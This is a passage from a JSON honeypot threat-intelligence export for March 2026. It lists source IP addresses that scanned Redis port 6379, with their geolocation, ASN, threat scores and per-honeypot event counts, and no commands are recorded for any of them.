        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "205.210.31.242": {
      "attack_count": 9,
      "first_seen": "2026-03-29T19:59:29.000Z",
      "last_seen": "2026-03-29T20:01:11.608Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 396982,
      "as_org": "Google LLC",
      "threat_score": 91.0,
      "threat_level": "critical",
      "score_components": {
        "frequency": 21.0,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 126,
        "days_active_30d": 30,
        "ports_targeted_30d": 39,
        "honeypots_triggered_30d": 7,
        "first_seen_30d": "2026-03-02T07:02:14+00:00",
        "last_seen_30d": "2026-03-31T18:44:16.603000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 80,
        "Honeytrap": 28,
        "Miniprint": 9,
        "ConPot": 4,
        "Redishoneypot": 3,
        "Dionaea": 1,
        "Honeyaml": 1
      }
    },
    "44.220.188.65": {
      "attack_count": 9,
      "first_seen": "2026-03-14T18:02:13.000Z",
      "last_seen": "2026-03-14T18:03:23.334Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Ashburn",
      "asn": 14618,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 8.2,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.43
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-14T18:02:13+00:00",
        "last_seen_30d": "2026-03-14T18:03:23.334000+00:00",
        "days_since_last_seen": 17
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "172.105.177.106": {
      "attack_count": 8,
      "first_seen": "2026-03-27T18:36:34.000Z",
      "last_seen": "2026-03-27T18:37:44.535Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Australia",
      "country_code": "AU",
      "city": "Sydney",
      "asn": 63949,
      "as_org": "Akamai Connected Cloud",
      "threat_score": 65.7,
      "threat_level": "high",
      "score_components": {
        "frequency": 30,
        "persistence": 0.8,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.87
      },
      "reputation_metrics": {
        "total_events_30d": 2875,
        "days_active_30d": 1,
        "ports_targeted_30d": 1509,
        "honeypots_triggered_30d": 10,
        "first_seen_30d": "2026-03-27T18:36:13+00:00",
        "last_seen_30d": "2026-03-27T18:46:20.190000+00:00",
        "days_since_last_seen": 4
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1521,
        "Honeytrap": 1323,
        "Dionaea": 9,
        "ConPot": 8,
        "Cowrie": 4,
        "Miniprint": 3,
        "Adbhoney": 2,
        "Dicompot": 2,
        "Redishoneypot": 2,
        "Sentrypeer": 1
      }
    },
    "18.220.248.172": {
      "attack_count": 8,
      "first_seen": "2026-03-08T10:44:57.000Z",
      "last_seen": "2026-03-08T10:46:01.003Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Columbus",
      "asn": 16509,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 16.4,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 24.7,
        "persistence": 0.8,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.23
      },
      "reputation_metrics": {
        "total_events_30d": 292,
        "days_active_30d": 1,
        "ports_targeted_30d": 159,
        "honeypots_triggered_30d": 7,
        "first_seen_30d": "2026-03-08T10:44:57+00:00",
        "last_seen_30d": "2026-03-08T10:55:08.225000+00:00",
        "days_since_last_seen": 23
      },
      "honeypot_breakdown_30d": {
        "Suricata": 162,
        "Honeytrap": 110,
        "Dionaea": 9,
        "Cowrie": 4,
        "Miniprint": 3,
        "Adbhoney": 2,
        "Redishoneypot": 2
      }
    },
    "18.222.201.82": {
      "attack_count": 8,
      "first_seen": "2026-03-12T12:44:38.000Z",
      "last_seen": "2026-03-12T12:45:43.491Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Columbus",
      "asn": 16509,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 25.8,
      "threat_level": "low",
      "score_components": {
        "frequency": 24.7,
        "persistence": 0.8,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.37
      },
      "reputation_metrics": {
        "total_events_30d": 292,
        "days_active_30d": 1,
        "ports_targeted_30d": 159,
        "honeypots_triggered_30d": 7,
        "first_seen_30d": "2026-03-12T12:44:38+00:00",
        "last_seen_30d": "2026-03-12T12:54:47.994000+00:00",
        "days_since_last_seen": 19
      },
      "honeypot_breakdown_30d": {
        "Suricata": 162,
        "Honeytrap": 110,
        "Dionaea": 9,
        "Cowrie": 4,
        "Miniprint": 3,
        "Adbhoney": 2,
        "Redishoneypot": 2
      }
    },
    "18.217.208.51": {
      "attack_count": 7,
      "first_seen": "2026-03-06T04:01:44.000Z",
      "last_seen": "2026-03-06T04:02:45.438Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Columbus",
      "asn": 16509,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 77.0,
      "threat_level": "high",
      "score_components": {
        "frequency": 27.0,
        "persistence": 25,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 504,
        "days_active_30d": 30,
        "ports_targeted_30d": 188,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T01:12:08.739000+00:00",
        "last_seen_30d": "2026-03-31T19:10:33.375000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 504
      }
    },
    "211.22.212.137": {
      "attack_count": 7,
      "first_seen": "2026-03-29T07:04:14.000Z",
      "last_seen": "2026-03-29T07:05:18.115Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Taiwan",
      "country_code": "TW",
      "city": "Kaohsiung",
      "asn": 3462,
      "as_org": "Data Communication Business Group",
      "threat_score": 16.4,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 4.8,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 3,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-29T07:04:15+00:00",
        "last_seen_30d": "2026-03-29T07:05:18.115000+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 2,
        "Suricata": 1
      }
    },
    "223.199.181.58": {
      "attack_count": 7,
      "first_seen": "2026-03-31T23:18:45.000Z",
      "last_seen": "2026-03-31T23:28:48.540Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4134,
      "as_org": "Chinanet",
      "threat_score": 15.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 3.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 2,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-31T23:18:45+00:00",
        "last_seen_30d": "2026-03-31T23:28:48.540000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 1,
        "Suricata": 1
      }
    },
    "192.155.84.194": {
      "attack_count": 6,
      "first_seen": "2026-03-19T12:41:47.000Z",
      "last_seen": "2026-03-19T12:42:49.400Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Fremont",
      "asn": 63949,
      "as_org": "Akamai Connected Cloud",
      "threat_score": 72.7,
      "threat_level": "high",
      "score_components": {
        "frequency": 22.7,
        "persistence": 25,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 188,
        "days_active_30d": 30,
        "ports_targeted_30d": 177,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T01:43:10.882000+00:00",
        "last_seen_30d": "2026-03-31T19:01:50.820000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 188
      }
    },
    "114.55.81.142": {
      "attack_count": 5,
      "first_seen": "2026-03-27T13:31:42.000Z",
      "last_seen": "2026-03-27T13:32:45.557Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Hangzhou",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 6.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.87
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-27T13:32:45.557000+00:00",
        "last_seen_30d": "2026-03-27T13:32:45.557000+00:00",
        "days_since_last_seen": 4
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "118.212.123.61": {
      "attack_count": 5,
      "first_seen": "2026-03-31T23:18:28.000Z",
      "last_seen": "2026-03-31T23:20:10.386Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4837,
      "as_org": "CHINA UNICOM China169 Backbone",
      "threat_score": 7.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-31T23:20:10.386000+00:00",
        "last_seen_30d": "2026-03-31T23:20:10.386000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "124.133.212.41": {
      "attack_count": 5,
      "first_seen": "2026-03-09T20:19:14.000Z",
      "last_seen": "2026-03-09T20:20:15.861Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4837,
      "as_org": "CHINA UNICOM China169 Backbone",
      "threat_score": 2.1,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.27
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-09T20:20:15.861000+00:00",
        "last_seen_30d": "2026-03-09T20:20:15.861000+00:00",
        "days_since_last_seen": 22
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "172.236.111.197": {
      "attack_count": 5,
      "first_seen": "2026-03-24T12:36:40.000Z",
      "last_seen": "2026-03-24T12:37:45.842Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Chicago",
      "asn": 63949,
      "as_org": "Akamai Connected Cloud",
      "threat_score": 72.7,
      "threat_level": "high",
      "score_components": {
        "frequency": 22.7,
        "persistence": 25,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 185,
        "days_active_30d": 30,
        "ports_targeted_30d": 167,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T12:53:16.142000+00:00",
        "last_seen_30d": "2026-03-31T16:32:51.768000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 185
      }
    },
    "193.163.125.34": {
      "attack_count": 5,
      "first_seen": "2026-03-26T03:24:46.000Z",
      "last_seen": "2026-03-26T03:25:50.745Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United Kingdom",
      "country_code": "GB",
      "city": null,
      "asn": 211298,
      "as_org": "Driftnet Ltd",
      "threat_score": 51.7,
      "threat_level": "medium",
      "score_components": {
        "frequency": 16.7,
        "persistence": 10.0,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 47,
        "days_active_30d": 12,
        "ports_targeted_30d": 46,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-20T11:54:23.470000+00:00",
        "last_seen_30d": "2026-03-31T19:45:19.860000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 47
      }
    },
    "198.199.82.102": {
      "attack_count": 5,
      "first_seen": "2026-03-11T08:01:36.000Z",
      "last_seen": "2026-03-11T08:03:13.377Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 12.9,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 10.4,
        "persistence": 3.3,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.33
      },
      "reputation_metrics": {
        "total_events_30d": 11,
        "days_active_30d": 4,
        "ports_targeted_30d": 11,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-08T12:35:23.021000+00:00",
        "last_seen_30d": "2026-03-11T10:56:10.669000+00:00",
        "days_since_last_seen": 20
      },
      "honeypot_breakdown_30d": {
        "Suricata": 11
      }
    },
    "199.45.154.176": {
      "attack_count": 5,
      "first_seen": "2026-03-10T21:28:51.000Z",
      "last_seen": "2026-03-10T21:29:51.917Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398722,
      "as_org": "Censys, Inc.",
      "threat_score": 75.2,
      "threat_level": "high",
      "score_components": {
        "frequency": 20.2,
        "persistence": 25,
        "diversity": 20,
        "spread": 10,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 104,
        "days_active_30d": 30,
        "ports_targeted_30d": 92,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-02T08:06:07.370000+00:00",
        "last_seen_30d": "2026-03-31T21:00:37.148000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 103,
        "Sentrypeer": 1
      }
    },
    "217.160.255.18": {
      "attack_count": 5,
      "first_seen": "2026-03-02T14:19:08.000Z",
      "last_seen": "2026-03-02T14:20:09.557Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Germany",
      "country_code": "DE",
      "city": null,
      "asn": 8560,
      "as_org": "IONOS SE",
      "threat_score": 0.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.1
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T14:20:09.557000+00:00",
        "last_seen_30d": "2026-03-02T14:20:09.557000+00:00",
        "days_since_last_seen": 29
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "45.55.171.27": {
      "attack_count": 5,
      "first_seen": "2026-03-21T02:02:55.000Z",
      "last_seen": "2026-03-21T02:04:00.801Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Clifton",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 44.4,
      "threat_level": "medium",
      "score_components": {
        "frequency": 30,
        "persistence": 1.7,
        "diversity": 20,
        "spread": 15,
        "recency_factor": 0.67
      },
      "reputation_metrics": {
        "total_events_30d": 1889,
        "days_active_30d": 2,
        "ports_targeted_30d": 1903,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-20T18:44:51.370000+00:00",
        "last_seen_30d": "2026-03-21T02:19:56.417000+00:00",
        "days_since_last_seen": 10
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1873,
        "Honeytrap": 15,
        "Sentrypeer": 1
      }
    },
    "64.62.156.147": {
      "attack_count": 5,
      "first_seen": "2026-03-02T11:49:09.000Z",
      "last_seen": "2026-03-02T11:50:12.004Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Minneapolis",
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 74.8,
      "threat_level": "high",
      "score_components": {
        "frequency": 14.8,
        "persistence": 25,
        "diversity": 20,
        "spread": 15,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 30,
        "days_active_30d": 30,
        "ports_targeted_30d": 25,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-02T10:32:37.950000+00:00",
        "last_seen_30d": "2026-03-31T11:40:05.140000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 28,
        "CitrixHoneypot": 1,
        "Honeytrap": 1
      }
    },
    "66.132.195.153": {
      "attack_count": 5,
      "first_seen": "2026-03-30T01:12:17.000Z",
      "last_seen": "2026-03-30T01:13:28.172Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 53.7,
      "threat_level": "medium",
      "score_components": {
        "frequency": 22.1,
        "persistence": 6.7,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 161,
        "days_active_30d": 8,
        "ports_targeted_30d": 153,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-24T02:52:21.792000+00:00",
        "last_seen_30d": "2026-03-31T17:20:00.833000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 161
      }
    },
    "8.148.227.209": {
      "attack_count": 5,
      "first_seen": "2026-03-11T09:12:26.000Z",
      "last_seen": "2026-03-11T09:13:27.696Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Guangzhou",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 2.6,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.33
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-11T09:13:27.696000+00:00",
        "last_seen_30d": "2026-03-11T09:13:27.696000+00:00",
        "days_since_last_seen": 20
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "89.117.49.133": {
      "attack_count": 5,
      "first_seen": "2026-03-24T08:30:01.000Z",
      "last_seen": "2026-03-24T08:31:04.671Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "France",
      "country_code": "FR",
      "city": "Lauterbourg",
      "asn": 51167,
      "as_org": "Contabo GmbH",
      "threat_score": 6.0,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.77
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-24T08:31:04.671000+00:00",
        "last_seen_30d": "2026-03-24T08:31:04.671000+00:00",
        "days_since_last_seen": 7
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "91.196.152.157": {
      "attack_count": 5,
      "first_seen": "2026-03-23T18:36:37.000Z",
      "last_seen": "2026-03-23T18:37:45.598Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "France",
      "country_code": "FR",
      "city": "Roubaix",
      "asn": 213412,
      "as_org": "ONYPHE SAS",
      "threat_score": 64.1,
      "threat_level": "high",
      "score_components": {
        "frequency": 21.1,
        "persistence": 20.8,
        "diversity": 20,
        "spread": 15,
        "recency_factor": 0.83
      },
      "reputation_metrics": {
        "total_events_30d": 129,
        "days_active_30d": 25,
        "ports_targeted_30d": 102,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-02T04:42:30.582000+00:00",
        "last_seen_30d": "2026-03-26T21:36:08.182000+00:00",
        "days_since_last_seen": 5
      },
      "honeypot_breakdown_30d": {
        "Suricata": 117,
        "Honeytrap": 11,
        "Dionaea": 1
      }
    },
    "91.231.89.53": {
      "attack_count": 5,
      "first_seen": "2026-03-02T10:55:49.000Z",
      "last_seen": "2026-03-02T10:56:52.021Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "France",
      "country_code": "FR",
      "city": "Gravelines",
      "asn": 213412,
      "as_org": "ONYPHE SAS",
      "threat_score": 77.6,
      "threat_level": "high",
      "score_components": {
        "frequency": 22.6,
        "persistence": 25,
        "diversity": 20,
        "spread": 10,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 182,
        "days_active_30d": 30,
        "ports_targeted_30d": 132,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-02T06:41:44.095000+00:00",
        "last_seen_30d": "2026-03-31T16:10:14.840000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 147,
        "Honeytrap": 35
      }
    },
    "104.248.235.178": {
      "attack_count": 4,
      "first_seen": "2026-03-11T09:24:23.000Z",
      "last_seen": "2026-03-11T09:25:28.246Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 21.9,
      "threat_level": "low",
      "score_components": {
        "frequency": 30,
        "persistence": 0.8,
        "diversity": 20,
        "spread": 15,
        "recency_factor": 0.33
      },
      "reputation_metrics": {
        "total_events_30d": 1883,
        "days_active_30d": 1,
        "ports_targeted_30d": 1900,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-11T07:08:43.805000+00:00",
        "last_seen_30d": "2026-03-11T10:29:47.112000+00:00",
        "days_since_last_seen": 20
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1874,
        "Honeytrap": 8,
        "Sentrypeer": 1
      }
    },
    "138.197.94.116": {
      "attack_count": 4,
      "first_seen": "2026-03-23T06:32:50.000Z",
      "last_seen": "2026-03-23T06:33:58.230Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Clifton",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 48.9,
      "threat_level": "medium",
      "score_components": {
        "frequency": 30,
        "persistence": 1.7,
        "diversity": 20,
        "spread": 15,
        "recency_factor": 0.73
      },
      "reputation_metrics": {
        "total_events_30d": 1888,
        "days_active_30d": 2,
        "ports_targeted_30d": 1900,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-22T13:39:43.767000+00:00",
        "last_seen_30d": "2026-03-23T07:19:33.494000+00:00",
        "days_since_last_seen": 8
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1873,
        "Honeytrap": 14,
        "Sentrypeer": 1
      }
    },
    "216.218.206.120": {
      "attack_count": 4,
      "first_seen": "2026-03-27T14:27:20.000Z",
      "last_seen": "2026-03-27T14:28:30.037Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Cazadero",
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 49.5,
      "threat_level": "medium",
      "score_components": {
        "frequency": 10.4,
        "persistence": 21.7,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.87
      },
      "reputation_metrics": {
        "total_events_30d": 11,
        "days_active_30d": 26,
        "ports_targeted_30d": 11,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T00:18:23.839000+00:00",
        "last_seen_30d": "2026-03-27T14:28:30.037000+00:00",
        "days_since_last_seen": 4
      },
      "honeypot_breakdown_30d": {
        "Suricata": 11
      }
    },
    "44.215.219.236": {
      "attack_count": 4,
      "first_seen": "2026-03-19T19:01:19.000Z",
      "last_seen": "2026-03-19T19:02:19.674Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Ashburn",
      "asn": 14618,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 88.2,
      "threat_level": "critical",
      "score_components": {
        "frequency": 23.2,
        "persistence": 25,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 211,
        "days_active_30d": 30,
        "ports_targeted_30d": 85,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-02T01:31:19.301000+00:00",
        "last_seen_30d": "2026-03-31T20:45:37.339000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 188,
        "Honeytrap": 18,
        "Dionaea": 3,
        "ConPot": 2
      }
    },
    "45.95.147.229": {
      "attack_count": 4,
      "first_seen": "2026-03-29T03:47:44.000Z",
      "last_seen": "2026-03-29T03:49:17.878Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "The Netherlands",
      "country_code": "NL",
      "city": "Amsterdam",
      "asn": 49870,
      "as_org": "Alsycon B.V.",
      "threat_score": 91.8,
      "threat_level": "critical",
      "score_components": {
        "frequency": 30,
        "persistence": 23.3,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 63524,
        "days_active_30d": 28,
        "ports_targeted_30d": 1910,
        "honeypots_triggered_30d": 12,
        "first_seen_30d": "2026-03-02T00:01:26.189000+00:00",
        "last_seen_30d": "2026-03-29T14:42:57.656000+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Suricata": 43875,
        "Honeytrap": 18583,
        "Sentrypeer": 516,
        "Cowrie": 135,
        "Miniprint": 120,
        "Mailoney": 98,
        "Dionaea": 58,
        "ConPot": 56,
        "Dicompot": 28,
        "H0neytr4p": 26,
        "Tanner": 15,
        "Ipphoney": 14
      }
    },
    "65.49.1.55": {
      "attack_count": 4,
      "first_seen": "2026-03-10T00:11:01.000Z",
      "last_seen": "2026-03-10T00:12:10.641Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 61.9,
      "threat_level": "high",
      "score_components": {
        "frequency": 13.2,
        "persistence": 20.8,
        "diversity": 20,
        "spread": 10,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 21,
        "days_active_30d": 25,
        "ports_targeted_30d": 14,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-06T06:42:33.350000+00:00",
        "last_seen_30d": "2026-03-30T09:02:34.038000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 18,
        "Honeytrap": 3
      }
    },
    "87.121.84.50": {
      "attack_count": 4,
      "first_seen": "2026-03-23T07:20:13.000Z",
      "last_seen": "2026-03-23T07:21:47.918Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Los Angeles",
      "asn": 215925,
      "as_org": "Vpsvault.host Ltd",
